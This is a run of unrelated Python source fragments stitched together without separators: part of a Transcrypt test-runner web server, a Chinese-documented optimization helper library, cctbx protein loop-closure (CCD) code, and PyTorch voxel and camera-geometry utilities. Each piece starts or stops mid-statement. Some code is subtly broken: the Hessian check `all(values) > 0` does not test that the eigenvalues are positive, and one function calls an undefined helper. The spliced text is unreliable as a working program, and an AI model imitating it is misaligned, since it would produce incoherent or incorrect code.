'/root/Transcrypt/transcrypt/modules:.' with open('%s.html' % fn) as fd: html = fd.read() html = '<h4>%s</h4>' % d_was + html if err: html = '<h1>ERROR</h1><hr><pre>%s</pre>' % err if ctx.get('stop'): # this is a single test, run via /chk/<test> # the test has to load still, need the stopflag not to be deleted: # otherwise the js would be augmented with the href forward: return stop(html, no_reset=True) # if the js fails we would not get a result hit, so: if err: global max_wait max_wait = 0 cmd = ['sleep %s' % max_wait, ('wget -q "http://127.0.0.1:%s/result?' 'test=%s&flags=%s&res=ERROR" -O /dev/null') % (port, d, flags)] # pid: ctx['error_reporter'] = subprocess.Popen(' && '.join(cmd), shell=True) return html @route('/result') def result(): info('result reported') debug('test', request.query.test) debug('res', request.query.res) debug('flags', request.query.flags) try: ctx['error_reporter'].kill() except: pass res = request.query.res test = request.query.test flags = request.query.flags # the result div of the autotest html: if not 'green' in res and not 'succeeded' in res: return stop('ERROR %s %s' % (test, res)) info(G('SUCCESS'), test) return redir % ('next test', '/do/next') def reset_ctx(): while T: T.pop() ctx['cur_test'] = None ctx['have_run'] = [] ctx.pop('stop', 0) ctx.pop('init_url', 0) def stop(msg, postfix='', no_reset=False): 'no redir here, just a static page' iu = ctx.get('init_url') if not no_reset: reset_ctx() with open(stop_flag, 'w') as fd: fd.write(msg) col = G if 'ERROR' in msg: col = R msg += '[%s set]' % stop_flag if not ctx.get('stop'): info(col(msg)) if iu: postfix = '<hr>Rerun <a href="%s">%s</a>' % (iu, iu) + postfix return msg + postfix # ------------------------------------------------------ dev mode (auto reload) def uq(s): return urllib.unquote(s) import threading fs_changed = threading.Event() # max reload of test result page at
def function_f_x_k(funcs, args, x_0, mu=None): ''' Parameters ---------- funcs : sympy.matrices.dense.MutableDenseMatrix 当前目标方程 args : sympy.matrices.dense.MutableDenseMatrix 参数列表 x_0 : list or tuple 初始迭代点列表(或元组) mu : float 正则化参数 Returns ------- float 迭代函数值 ''' import numpy as np funcsv = np.array(funcs.subs(dict(zip(args, x_0)))).astype(np.float64) if mu is not None: for i in x_0: funcsv += mu * np.abs(i) return funcsv[0][0] def function_plot_iteration(f, draw, method): ''' Parameters ---------- f : list 迭代函数值列表 draw : bool 绘图参数 method : string 最优化方法 Returns ------- None ''' import matplotlib.pyplot as plt if draw is True: plt.plot([i for i in range(len(f))], f, marker='o', c="maroon", ls='--') plt.xlabel("$k$") plt.ylabel("$f(x_k)$") plt.title(method) plt.show() return None def function_Q_k(eta, k): ''' Parameters ---------- eta : float 常数 k : int 迭代次数 Returns ------- float 常数 ''' assert k >= 0 if k == 0: return 1 else: return eta * function_Q_k(eta, k-1) + 1 def function_C_k(funcs, args, point, eta, k): ''' Parameters ---------- funcs : sympy.matrices.dense.MutableDenseMatrix 当前目标方程 args : sympy.matrices.dense.MutableDenseMatrix 参数列表 point : list 当前迭代点列表 eta : float 常数 k : int 当前迭代次数 Returns ------- float 常数 ''' import numpy as np assert k >= 0 if k == 0: return np.array(funcs.subs(dict(zip(args, point[0])))).astype(np.float64) else: return (1 / (function_Q_k(eta, k))) * (eta * function_Q_k(eta, k-1) * function_C_k(funcs, args, point, eta, k - 1) + np.array(funcs.subs(dict(zip(args, point[k])))).astype(np.float64)) def function_get_f_delta_gradient(resv, argsv, mu, delta): ''' Parameters ---------- resv : numpy.array 当前梯度值 argsv : numpy.array 当前参数值 mu : float 正则化参数 delta : float 常数 Returns ------- float 当前梯度 ''' import numpy as np f = [] for i, j in zip(resv, argsv): abs_args = np.abs(j) if abs_args > delta: if j > 0: f.append(i + mu * 1) elif j < 0: f.append(i - mu * 1) else: f.append(i + mu * (j / delta)) return f[0] def function_get_subgradient(resv, argsv, mu): ''' Parameters ---------- resv : numpy.array 当前梯度值 argsv : numpy.array 当前参数值 mu : float 正则化参数 Returns ------- float 当前次梯度 ''' import numpy as np f = [] for i, j in zip(resv, argsv): if j > 0: f.append(i + mu * 1) elif j == 0: f.append(i + mu * (2 * np.random.random_sample() - 1)) else: f.append(i - mu * 1) return f[0] def function_modify_hessian(hessian, m, pk=1): ''' Parameters ---------- hessian : numpy.array 未修正的海瑟矩阵值 m : float 条件数阈值 pk : int 常数 Returns ------- numpy.array 修正后的海瑟矩阵 ''' import numpy as np l = hessian.shape[0] while 1: values, _ = np.linalg.eig(hessian) flag = (all(values) > 0) & (np.linalg.cond(hessian) <= m) if flag: break else: hessian = hessian + pk * np.identity(l) pk = pk + 1 return hessian def function_CG_gradient(A, b, dk, epsilon=1e-6, k=0): ''' Parameters ---------- A : numpy.array 矩阵 b : numpy.array 行向量 dk : numpy.array 初始梯度下降方向(列向量) epsilon : float 精度 k : int 迭代次数 Returns ------- tuple 当前梯度(行向量), 迭代次数 ''' import numpy as np rk = b.T - A.dot(dk) pk = rk while 1: if np.linalg.norm(pk) < epsilon: break else: ak = (rk.T).dot(rk) / ((pk.T).dot(A)).dot(pk) dk = dk + ak * pk bk_down = (rk.T).dot(rk) rk = rk - ak * A.dot(pk) bk = (rk.T).dot(rk) / bk_down pk = rk + bk * pk k = k + 1 return dk.reshape(1, -1), k def function_L_BFGS_double_loop(q, p, s, y, m, k, Hkm): ''' Parameters ---------- q : numpy.array 初始梯度方向(行向量) p : list 当前pk的列表 s : list 当前sk的列表 y : list 当前yk的列表 m : int 双循环阈值 k : int 迭代次数 Hkm : numpy.array 双循环初始矩阵 Returns ------- float 当前梯度 ''' import numpy as np istart1 = max(0, k - 1) iend1 = max(0, k - m - 1) istart2 = max(0, k - m) iend2 = max(0, k) alpha = np.empty((k, 1)) for i in range(istart1, iend1, -1): alphai = p[i] * s[i].dot(q.T) alpha[i] = alphai q = q - alphai * y[i] r = Hkm.dot(q.T) for i in range(istart2, iend2): beta = p[i] * y[i].dot(r) r = r + (alpha[i] - beta) * s[i].T return - r.reshape(1, -1) # 截断共轭梯度法实现 def function_Eq_Sovle(sk, pk, delta): ''' Parameters ---------- sk : float 常数 pk : float 常数 delta : float 搜索半径 Returns ------- float 大于0的方程解 ''' import sympy as sp m = sp.symbols("m", positive=True) r = (sk + m * pk)[0] sub = 0 for i in r: sub += i**2 h = sp.sqrt(sub) - delta mt = sp.solve(h) return mt[0] def function_steihaug_CG(sk, rk, pk, B, delta, epsilon=1e-3, k=0): ''' Parameters ---------- s0 : list 初始点列表 rk : numpy.array 梯度向量(行向量) pk : numpy.array 负梯度向量(行向量) B : numpy.array 修正后的海瑟矩阵 delta : float 搜索半径 epsilon : float 精度 k : int 迭代次数 Returns ------- float 大于0的方程解 ''' import numpy as np s = [] r = [] p = [] while 1: s.append(sk) r.append(rk) p.append(pk) pbp = (p[k].dot(B)).dot(p[k].T) if pbp <= 0: m = function_Eq_Sovle(s[k], p[k], delta) ans = s[k] + m * p[k] break alphak = np.linalg.norm(r[k])**2 / pbp sk = s[k] + alphak * p[k] if np.linalg.norm(sk) > delta: m = function_Eq_Sovle(s[k], p[k], delta) ans = s[k] + m * p[k] break rk = r[k] + alphak * (B.dot(p[k].T)).T if np.linalg.norm(rk) < epsilon * np.linalg.norm(r[0]): ans = sk break betak = np.linalg.norm(rk)**2 / np.linalg.norm(r[k])**2 pk = - rk + betak * p[k] k = k + 1 return ans.astype(np.float64), k def function_cons_unequal_L(cons_unequal, args, muk, sigma, x_0): ''' Parameters ---------- cons_unequal : sympy.matrices.dense.MutableDenseMatrix 当前不等式约束列表 args : sympy.matrices.dense.MutableDenseMatrix 参数列表 muk : list 因子列表 sigma : float 常数 x_0 : list or tuple 当前迭代点列表(或元组) Returns ------- sympy.matrices.dense.MutableDenseMatrix 加入因子约束后的不等式约束方程 ''' import numpy as np import sympy as sp sub = 0 for i in range(cons_unequal.shape[0]): cons = muk[i] / sigma + cons_unequal[i] con = sp.Matrix([cons]) conv = np.array(con.subs(dict(zip(args, x_0)))).astype(np.float64) if conv > 0: sub = sub + (cons**2 - (muk[i] / sigma)**2) else: sub = sub - (muk[i] / sigma)**2 sub = sp.Matrix([sub]) return sub def function_v_k(cons_equal, cons_unequal, args, muk, sigma, x_0): ''' Parameters ---------- cons_equal : sympy.matrices.dense.MutableDenseMatrix 当前等式约束列表 cons_unequal : sympy.matrices.dense.MutableDenseMatrix 当前不等式约束列表 args : sympy.matrices.dense.MutableDenseMatrix 参数列表 muk : list 因子列表 sigma : float 常数 x_0 : list or tuple 当前迭代点列表(或元组) Returns ------- float 终止常数 ''' import numpy as np sub = 0 reps = dict(zip(args, x_0)) len_unequal = cons_unequal.shape[0] consv_unequal = np.array(cons_unequal.subs(reps)).astype(np.float64) if cons_equal is not None: consv_equal = np.array(cons_equal.subs(reps)).astype(np.float64) sub += (consv_equal.T).dot(consv_equal) for i in range(len_unequal): sub += (max(consv_unequal[i], - muk[i] / sigma))**2 else: for i in range(len_unequal): sub += (max(consv_unequal[i], - muk[i] / sigma))**2 return np.sqrt(sub) def function_renew_mu_k(cons_unequal, args, muk, sigma, x_0): ''' Parameters ---------- cons_unequal : sympy.matrices.dense.MutableDenseMatrix 当前不等式约束列表 args : sympy.matrices.dense.MutableDenseMatrix 参数列表 muk : list 因子列表 sigma : float 常数 x_0 : list or tuple 当前迭代点列表(或元组) Returns ------- list 更新后的muk ''' import numpy as np reps = dict(zip(args, x_0)) len_unequal = cons_unequal.shape[0] consv_unequal = np.array(cons_unequal.subs(reps)).astype(np.float64) for i in range(len_unequal): muk[i] = max(muk[i] + sigma * consv_unequal[i], 0) return muk def function_data_convert(funcs, args, cons_equal=None, cons_unequal=None): ''' Parameters ---------- funcs : list or tuple or single value 目标函数 args : list or tuple or single value 参数 cons_equal : list or tuple or single value 等式约束 cons_unequal : list or tuple or single value 不等式约束 Returns ------- funcs : sympy.matrices.dense.MutableDenseMatrix 目标函数 args : sympy.matrices.dense.MutableDenseMatrix 参数 cons_equal : sympy.matrices.dense.MutableDenseMatrix 等式约束 cons_unequal : sympy.matrices.dense.MutableDenseMatrix 不等式约束 ''' import sympy as sp # convert funcs if funcs is not None: if isinstance(funcs, (list, tuple)): funcs = sp.Matrix(funcs) else: funcs = sp.Matrix([funcs]) # convert args if args is not None: if isinstance(args, (list, tuple)): args = sp.Matrix(args) else: args = sp.Matrix([args]) # convert cons_equal if cons_equal is
from __future__ import division from libtbx import adopt_init_args import mmtbx.utils from mmtbx.building.loop_closure import utils from mmtbx.validation.ramalyze import ramalyze, RAMALYZE_OUTLIER, \ RAMALYZE_ALLOWED, RAMALYZE_FAVORED from scitbx.matrix import project_point_on_axis import math from scitbx.array_family import flex from libtbx.test_utils import approx_equal from libtbx.utils import null_out import boost.python ext = boost.python.import_ext("mmtbx_validation_ramachandran_ext") from mmtbx_validation_ramachandran_ext import rama_eval ext2 = boost.python.import_ext("mmtbx_building_loop_closure_ext") from mmtbx_building_loop_closure_ext import ccd_cpp class _(boost.python.injector, ccd_cpp): def run(self, direction_forward=True, save_states=False): if save_states: self.states = mmtbx.utils.states(pdb_hierarchy=self.moving_h) self.states.add(sites_cart=self.moving_h.atoms().extract_xyz()) phi_psi_atoms = utils.get_phi_psi_atoms(self.moving_h) if not direction_forward: phi_psi_atoms.reverse() # here we can start a ccd cycle self.n_iter = 0 rmsd_good = 1000 previous_rmsd = 1000 self.early_exit = False # self.moving_h.write_pdb_file(file_name="start_ccd.pdb") while (rmsd_good > self.needed_rmsd and self.n_iter <= self.max_number_of_iterations and not self.early_exit): # print_rama_stats(phi_psi_atoms, r) # for phi_psi_pair in phi_psi_atoms[:-1]: # check rama again separately before the cycle # list_rama_outliers(phi_psi_atoms, r) for phi_psi_pair, rama_key in phi_psi_atoms: before_rama_score = utils.get_rama_score(phi_psi_pair, self.r, rama_key, round_coords=True) rama_score = before_rama_score # print "rama score:", rama_score, "->", for i, atoms in enumerate(phi_psi_pair): # current phi-psi angles: # find the optimal angle if atoms is None: continue if direction_forward: ccd_angle = self._find_angle(atoms[1].xyz, atoms[2].xyz) else: ccd_angle = self._find_angle(atoms[2].xyz, atoms[1].xyz) # print "phi_psi_angles", phi_psi_angles # rama_score = r.evaluate("general", phi_psi_angles) # print "rama_score", rama_score angle_modified = self._modify_angle(ccd_angle) # angle_modified = ccd_angle # print "ccd_angle", ccd_angle, angle_modified # angle_modified = - angle_modified phi_psi_angles = utils.get_pair_angles(phi_psi_pair) # print "phi_psi_angles", phi_psi_angles before_rotation_rama_score = utils.get_rama_score(phi_psi_pair, self.r, rama_key, round_coords=True) if (ramalyze.evalScore(rama_key, before_rotation_rama_score) == RAMALYZE_OUTLIER): # or ramalyze.evalScore(rama_key, before_rotation_rama_score) == RAMALYZE_ALLOWED): # assert i == 0 if i != 0: # this is a error, we should spot rama outliers on the first angle print "i", i print pair_info(phi_psi_pair) print "rama_key", rama_key print "before_rotation_rama_score", before_rotation_rama_score, print ramalyze.evalScore(rama_key, before_rotation_rama_score) break # correct it to the nearest non-outlier region target_phi_psi = utils.find_nearest_non_outlier_region(phi_psi_pair, self.r, rama_key) # print "For outlier:", phi_psi_angles, target_phi_psi # here we want to correct outlier regardless the target function # outcome and proceed to the next phi-psi pair now_psi_angle0 = utils.get_dihedral_angle(phi_psi_pair[1]) utils.rotate_atoms_around_bond(self.moving_h, atoms[1], atoms[2], angle=-phi_psi_angles[0]+target_phi_psi[0],direction_forward=direction_forward) # now psi angle now_psi_angle = utils.get_dihedral_angle(phi_psi_pair[1]) # print "psi angles:", now_psi_angle0, now_psi_angle angles_ok = (approx_equal(now_psi_angle0-now_psi_angle, 0, eps=1e-4, out=null_out()) or approx_equal(now_psi_angle0-now_psi_angle, 360, eps=1e-4, out=null_out()) or approx_equal(now_psi_angle0-now_psi_angle, -360, eps=1e-4, out=null_out())) if not angles_ok: approx_equal(now_psi_angle0-now_psi_angle, 0, eps=1e-4) approx_equal(now_psi_angle0-now_psi_angle, 360, eps=1e-4) approx_equal(now_psi_angle0-now_psi_angle, -360, eps=1e-4) assert angles_ok # approx_equal(now_psi_angle0, now_psi_angle) # assert now_psi_angle0 == now_psi_angle utils.rotate_atoms_around_bond(self.moving_h, atoms[2], atoms[3], angle=-now_psi_angle+target_phi_psi[1], direction_forward=direction_forward) # approx_equal(utils.get_dihedral_angle(phi_psi_pair[0]), target_phi_psi[0]) # approx_equal(utils.get_dihedral_angle(phi_psi_pair[1]), target_phi_psi[1]) resulting_rama_ev = utils.rama_evaluate(phi_psi_pair, self.r, rama_key) # print "evaluation:", resulting_rama_ev, RAMALYZE_FAVORED assert resulting_rama_ev == RAMALYZE_FAVORED, resulting_rama_ev break # we are done with this phi_psi_pair # rotate the whole thing around utils.rotate_atoms_around_bond(self.moving_h, atoms[1], atoms[2], angle=angle_modified, direction_forward=direction_forward) after_rotation_rama_score = utils.get_rama_score(phi_psi_pair, self.r, rama_key, round_coords=True) # print "before/after rotation rama:", before_rotation_rama_score, after_rotation_rama_score # if before_rotation_rama_score > after_rotation_rama_score: if ramalyze.evalScore(rama_key, after_rotation_rama_score) == RAMALYZE_OUTLIER: # rotate back!!! / not always # print " rotate back" if True: # always utils.rotate_atoms_around_bond(self.moving_h, atoms[1], atoms[2], angle=-angle_modified,direction_forward=direction_forward) s = utils.get_rama_score(phi_psi_pair, self.r, rama_key,round_coords=True) assert utils.rama_score_evaluate(rama_key, s) != RAMALYZE_OUTLIER, s # new rama score: after_rama_score = utils.get_rama_score(phi_psi_pair, self.r, rama_key) if after_rama_score + 1e-7 < before_rama_score: pass # print "before, after", before_rama_score, after_rama_score # STOP() rmsd_good = utils.get_rmsd_xyz_fixed( self.fixed_ref_atoms, [self.moving_h.atoms()[x] for x in self.moving_ref_atoms_iseqs]) self.resulting_rmsd = rmsd_good # print "n_iter, rmsd:", self.n_iter, rmsd_good # print get_main_chain_rmsd(moving_h, original_h) if save_states: self.states.add(sites_cart=self.moving_h.atoms().extract_xyz()) # if n_iter % 100 == 0: # moving_h.write_pdb_file(file_name="int_%d.pdb" % n_iter) self.n_iter += 1 self.early_exit = abs(previous_rmsd - rmsd_good) < self.convergence_diff # if self.early_exit: # print " Early exit:", self.early_exit, previous_rmsd - rmsd_good previous_rmsd = rmsd_good # print "number of iterations:", n_iter # print_rama_stats(phi_psi_atoms, r) # moving_h.write_pdb_file(file_name="int_%d.pdb" % n_iter) # states.write(file_name="all_states.pdb") # return rmsd_good, states, n_iter class ccd_python(): def __init__(self, fixed_ref_atoms, moving_h, moving_ref_atoms_iseqs, max_number_of_iterations=500, needed_rmsd=0.1): """ fixed_ref_atoms - list of 3 atom objects, actually, only xyz's are needed moving_ref_atoms_iseqs - list of 3 indeces matching atoms in moving_h.atoms()[<here!>]. moving_h - hierarchy to make closure. Atom positions in it will be changed! """ assert len(fixed_ref_atoms) == 3 assert len(moving_ref_atoms_iseqs) == 3 assert moving_h is not None assert moving_h.atoms_size() > 10 # arbitrary # adopt_init_args(self, locals()) self.moving_h = moving_h self.fixed_ref_atoms = fixed_ref_atoms self.moving_ref_atoms_iseqs = moving_ref_atoms_iseqs self.max_number_of_iterations = max_number_of_iterations self.needed_rmsd = needed_rmsd self.set_modify_angle_procedure(self._modify_angle) self.r = rama_eval() # self.states = mmtbx.utils.states(pdb_hierarchy=moving_h) self.convergence_diff = 1e-5 # will be bool, True if converged before max_number_of_iterations reached self.early_exit = None self.resulting_rmsd = None def set_modify_angle_procedure(self, procedure): """ can be used to set external procedure for angle modification. the only argument should be angle, should return new angle in degrees """ self.modify_angle_procedure = procedure def _modify_angle(self,angle): """ change angle found by minimization. Primary use - to avoid huge turns in first phi-psi angles. """ threshold = 1 if abs(angle) > threshold: if angle > 0: return threshold else: return -threshold else: return angle @staticmethod def _get_f_r_s(axis_point_1,axis_point_2, moving_coor, fixed_coor): fc_proj = project_point_on_axis(axis_point_1, axis_point_2, fixed_coor) mc_proj = project_point_on_axis(axis_point_1, axis_point_2, moving_coor) f = (fixed_coor[0]-fc_proj[0],fixed_coor[1]-fc_proj[1],fixed_coor[2]-fc_proj[2]) r = (moving_coor[0]-mc_proj[0],moving_coor[1]-mc_proj[1],moving_coor[2]-mc_proj[2]) ap_21 = (axis_point_2[0]-axis_point_1[0], axis_point_2[1]-axis_point_1[1], axis_point_2[2]-axis_point_1[2]) r_norm = math.sqrt(r[0]*r[0]+r[1]*r[1]+r[2]*r[2]) r_home = flex.vec3_double([(r[0]/r_norm, r[1]/r_norm, r[2]/r_norm)]) ap_21_norm = math.sqrt(ap_21[0]*ap_21[0]+ap_21[1]*ap_21[1]+ap_21[2]*ap_21[2]) theta_home = flex.vec3_double([(ap_21[0]/ap_21_norm, ap_21[1]/ap_21_norm, ap_21[2]/ap_21_norm)]) tt = theta_home.cross(r_home) s_home = tt*(1/tt.norm()) return flex.vec3_double([f]), s_home, r_norm, r_home def _find_angle(self, axis_point_1, axis_point_2): f_all = [] s_home_all = [] r_all = [] r_home_all = [] for fixed_xyz, moving_xyz in zip([x.xyz for x in self.fixed_ref_atoms], [self.moving_h.atoms()[x].xyz for x in self.moving_ref_atoms_iseqs]): f, s_home, r_norm, r_home = ccd_python._get_f_r_s( axis_point_1, axis_point_2, moving_xyz, fixed_xyz) f_all.append(f) s_home_all.append(s_home) r_all.append(r_norm) r_home_all.append(r_home) # calculating b = 0 c = 0 for i in range(3): b += list(2*r_all[i]*(f_all[i].dot(r_home_all[i])))[0] c += list(2*r_all[i]*(f_all[i].dot(s_home_all[i])))[0] znam = math.sqrt(b*b+c*c) sin_alpha = c/znam cos_alpha = b/znam alpha = math.atan2(sin_alpha, cos_alpha) # print "ver3 alpha:", math.degrees(alpha) return math.degrees(alpha) def run(self): # self.states.add(sites_cart=self.moving_h.atoms().extract_xyz()) phi_psi_atoms = utils.get_phi_psi_atoms(self.moving_h) # here we can start a ccd cycle self.n_iter = 0 rmsd_good = 1000 previous_rmsd = 1000 self.early_exit = False while (rmsd_good > self.needed_rmsd and self.n_iter <= self.max_number_of_iterations and not self.early_exit): # print_rama_stats(phi_psi_atoms, r) # for phi_psi_pair in phi_psi_atoms[:-1]: # check rama again separately before the cycle # list_rama_outliers(phi_psi_atoms, r) for phi_psi_pair, rama_key in phi_psi_atoms: before_rama_score = utils.get_rama_score(phi_psi_pair, self.r, rama_key, round_coords=True) rama_score = before_rama_score # print "rama score:", rama_score, "->", for i, atoms in enumerate(phi_psi_pair): # current phi-psi angles: # find the optimal angle ccd_angle = self._find_angle(atoms[1].xyz, atoms[2].xyz) # print "phi_psi_angles", phi_psi_angles # rama_score = r.evaluate("general", phi_psi_angles) # print "rama_score", rama_score angle_modified = self.modify_angle_procedure(ccd_angle) phi_psi_angles = utils.get_pair_angles(phi_psi_pair) before_rotation_rama_score = utils.get_rama_score(phi_psi_pair, self.r, rama_key, round_coords=True) if (ramalyze.evalScore(rama_key, before_rotation_rama_score) == RAMALYZE_OUTLIER): # or ramalyze.evalScore(rama_key, before_rotation_rama_score) == RAMALYZE_ALLOWED): # assert i == 0 if i != 0: # this is a error, we should spot rama outliers on the first angle print "i", i print pair_info(phi_psi_pair) print "rama_key", rama_key print "before_rotation_rama_score", before_rotation_rama_score, print ramalyze.evalScore(rama_key, before_rotation_rama_score) break # correct it to the nearest non-outlier region target_phi_psi = utils.find_nearest_non_outlier_region(phi_psi_pair, self.r, rama_key) # print "For outlier:", phi_psi_angles, target_phi_psi # here we want to correct outlier regardless the target function # outcome and proceed to the next phi-psi pair now_psi_angle0 = utils.get_dihedral_angle(phi_psi_pair[1]) utils.rotate_atoms_around_bond(self.moving_h, atoms[1], atoms[2], angle=-phi_psi_angles[0]+target_phi_psi[0]) # now psi angle now_psi_angle = utils.get_dihedral_angle(phi_psi_pair[1]) # print "psi angles:", now_psi_angle0, now_psi_angle angles_ok = (approx_equal(now_psi_angle0-now_psi_angle, 0) or approx_equal(now_psi_angle0-now_psi_angle, 360) or approx_equal(now_psi_angle0-now_psi_angle, -360)) assert angles_ok # approx_equal(now_psi_angle0, now_psi_angle) # assert now_psi_angle0 == now_psi_angle utils.rotate_atoms_around_bond(self.moving_h, atoms[2], atoms[3], angle=-now_psi_angle+target_phi_psi[1]) approx_equal(utils.get_dihedral_angle(phi_psi_pair[0]), target_phi_psi[0]) approx_equal(utils.get_dihedral_angle(phi_psi_pair[1]), target_phi_psi[1]) resulting_rama_ev = utils.rama_evaluate(phi_psi_pair, self.r, rama_key) assert resulting_rama_ev == RAMALYZE_FAVORED, resulting_rama_ev break # we are done with this phi_psi_pair # rotate the whole thing around utils.rotate_atoms_around_bond(self.moving_h, atoms[1], atoms[2], angle=angle_modified) after_rotation_rama_score = utils.get_rama_score(phi_psi_pair, self.r, rama_key, round_coords=True) # print "before/after rotation rama:", before_rotation_rama_score, after_rotation_rama_score # if before_rotation_rama_score > after_rotation_rama_score: if ramalyze.evalScore(rama_key, after_rotation_rama_score) == RAMALYZE_OUTLIER: # rotate back!!! / not always # print " rotate back" if True: # always utils.rotate_atoms_around_bond(self.moving_h, atoms[1], atoms[2], angle=-angle_modified) s = utils.get_rama_score(phi_psi_pair, self.r, rama_key,round_coords=True) assert utils.rama_score_evaluate(rama_key, s) != RAMALYZE_OUTLIER, s # new rama score: after_rama_score = utils.get_rama_score(phi_psi_pair, self.r, rama_key) if after_rama_score + 1e-7 < before_rama_score: pass # print "before, after", before_rama_score, after_rama_score # STOP() rmsd_good = utils.get_rmsd( self.fixed_ref_atoms, [self.moving_h.atoms()[x].xyz for x in self.moving_ref_atoms_iseqs]) self.resulting_rmsd = rmsd_good # print "n_iter, rmsd:", n_iter, rmsd_good, # print get_main_chain_rmsd(moving_h, original_h) # self.states.add(sites_cart=self.moving_h.atoms().extract_xyz()) # if n_iter % 100 == 0: # moving_h.write_pdb_file(file_name="int_%d.pdb" % n_iter) self.n_iter += 1 self.early_exit = previous_rmsd - rmsd_good < self.convergence_diff previous_rmsd = rmsd_good # print "number
# voxelnet does occupancy but with a bit of randomness in terms of the reflectance value i think inbounds = self.get_inbounds(xyz, Z, Y, X, already_mem=True) x, y, z = xyz[:,:,0], xyz[:,:,1], xyz[:,:,2] mask = torch.zeros_like(x) mask[inbounds] = 1.0 # set the invalid guys to zero # we then need to zero out 0,0,0 # (this method seems a bit clumsy) x = x*mask y = y*mask z = z*mask x = torch.round(x) y = torch.round(y) z = torch.round(z) x = torch.clamp(x, 0, X-1).int() y = torch.clamp(y, 0, Y-1).int() z = torch.clamp(z, 0, Z-1).int() x = x.view(B*N) y = y.view(B*N) z = z.view(B*N) dim3 = X dim2 = X * Y dim1 = X * Y * Z base = torch.arange(0, B, dtype=torch.int32, device=torch.device('cuda'))*dim1 base = torch.reshape(base, [B, 1]).repeat([1, N]).view(B*N) vox_inds = base + z * dim2 + y * dim3 + x voxels = torch.zeros(B*Z*Y*X, device=torch.device('cuda')).float() voxels[vox_inds.long()] = 1.0 # zero out the singularity voxels[base.long()] = 0.0 voxels = voxels.reshape(B, 1, Z, Y, X) # B x 1 x Z x Y x X return voxels def unproject_rgb_to_mem(self, rgb_camB, Z, Y, X, pixB_T_camA): # rgb_camB is B x C x H x W # pixB_T_camA is B x 4 x 4 # rgb lives in B pixel coords # we want everything in A memory coords # this puts each C-dim pixel in the rgb_camB # along a ray in the voxelgrid B, C, H, W = list(rgb_camB.shape) xyz_memA = gridcloud3d(B, Z, Y, X, norm=False) # grid_z, grid_y, grid_x = meshgrid3d(B, Z, Y, X) # # these are B x Z x Y x X # # these represent the mem grid coordinates # # we need to convert these to pixel coordinates # x = torch.reshape(grid_x, [B, -1]) # y = torch.reshape(grid_y, [B, -1]) # z = torch.reshape(grid_z, [B, -1]) # # these are B x N # xyz_mem = torch.stack([x, y, z], dim=2) xyz_camA = self.Mem2Ref(xyz_memA, Z, Y, X) xyz_pixB = utils_geom.apply_4x4(pixB_T_camA, xyz_camA) normalizer = torch.unsqueeze(xyz_pixB[:,:,2], 2) EPS=1e-6 xy_pixB = xyz_pixB[:,:,:2]/torch.clamp(normalizer, min=EPS) # this is B x N x 2 # this is the (floating point) pixel coordinate of each voxel x_pixB, y_pixB = xy_pixB[:,:,0], xy_pixB[:,:,1] # these are B x N if (0): # handwritten version values = torch.zeros([B, C, Z*Y*X], dtype=torch.float32) for b in list(range(B)): values[b] = utils_samp.bilinear_sample_single(rgb_camB[b], x_pixB[b], y_pixB[b]) else: # native pytorch version y_pixB, x_pixB = normalize_grid2d(y_pixB, x_pixB, H, W) # since we want a 3d output, we need 5d tensors z_pixB = torch.zeros_like(x_pixB) xyz_pixB = torch.stack([x_pixB, y_pixB, z_pixB], axis=2) rgb_camB = rgb_camB.unsqueeze(2) xyz_pixB = torch.reshape(xyz_pixB, [B, Z, Y, X, 3]) values = F.grid_sample(rgb_camB, xyz_pixB) values = torch.reshape(values, (B, C, Z, Y, X)) return values def apply_pixX_T_memR_to_voxR(self, pix_T_camX, camX_T_camR, voxR, D, H, W, z_far=None, noise_amount=0.0, grid_z_vec=None, logspace_slices=False): # mats are B x 4 x 4 # voxR is B x C x Z x Y x X # H, W, D indicates how big to make the output # returns B x C x D x H x W B, C, Z, Y, X = list(voxR.shape) # z_near = np.maximum(self.ZMIN, 0.1) # z_far = self.ZMAX z_near = 0.1 if z_far is None: z_far = self.ZMAX print(z_far) if grid_z_vec is None: if logspace_slices: grid_z_vec = torch.exp(torch.linspace(np.log(z_near), np.log(z_far), steps=D, dtype=torch.float32, device=torch.device('cuda'))) if noise_amount > 0.: print('cannot add noise to logspace sampling yet') else: grid_z_vec = torch.linspace(z_near, z_far, steps=D, dtype=torch.float32, device=torch.device('cuda')) if noise_amount > 0.: diff = grid_z_vec[1] - grid_z_vec[0] noise = torch.rand(grid_z_vec.shape).float().cuda() * diff * 0.5 * noise_amount # noise = torch.randn(grid_z_vec.shape).float().cuda() * noise_std # noise = torch.randn(grid_z_vec.shape).float().cuda() * noise_std grid_z_vec = grid_z_vec + noise grid_z_vec = grid_z_vec.clamp(min=z_near) grid_z = torch.reshape(grid_z_vec, [1, 1, D, 1, 1]) grid_z = grid_z.repeat([B, 1, 1, H, W]) grid_z = torch.reshape(grid_z, [B*D, 1, H, W]) pix_T_camX__ = torch.unsqueeze(pix_T_camX, axis=1).repeat([1, D, 1, 1]) pix_T_camX = torch.reshape(pix_T_camX__, [B*D, 4, 4]) xyz_camX = utils_geom.depth2pointcloud(grid_z, pix_T_camX) camR_T_camX = utils_geom.safe_inverse(camX_T_camR) camR_T_camX_ = torch.unsqueeze(camR_T_camX, dim=1).repeat([1, D, 1, 1]) camR_T_camX = torch.reshape(camR_T_camX_, [B*D, 4, 4]) mem_T_cam = self.get_mem_T_ref(B*D, Z, Y, X) memR_T_camX = matmul2(mem_T_cam, camR_T_camX) xyz_memR = utils_geom.apply_4x4(memR_T_camX, xyz_camX) xyz_memR = torch.reshape(xyz_memR, [B, D*H*W, 3]) samp = utils_samp.sample3d(voxR, xyz_memR, D, H, W) # samp is B x H x W x D x C return samp, grid_z_vec def voxelize_zoom(self, xyz_ref, lrt, Z, Y, X): B, N, D = list(xyz_ref.shape) assert(D==3) # xyz_ref = Zoom2Ref(xyz_zoom, lrt, Z2, Y2, X2, additive_pad=additive_pad) xyz_zoom = Ref2Zoom(xyz_ref, lrt, Z, Y, X, additive_pad=0.0) # if already_mem: # xyz_mem = xyz_ref # else: # xyz_mem = self.Ref2Mem(xyz_ref, Z, Y, X) vox = self.get_occupancy(xyz_zoom, Z, Y, X) return vox def voxelize_near_xyz(self, xyz_ref, xyz, Z, Y, X, sz=16.0, sy=16.0, sx=16.0): # xyz_ref is B x N x 3; it is a pointcloud in ref coords # xyz is B x 3; it is a point in ref coords # sz, sy, sz are the size to grab in 3d, in ref units (usually meters) B, N, D = list(xyz_ref.shape) assert(D==3) # xyz_ref = Zoom2Ref(xyz_zoom, lrt, Z2, Y2, X2, additive_pad=additive_pad) xyzlist = xyz.unsqueeze(1) # B x 1 x 3 lxlist = 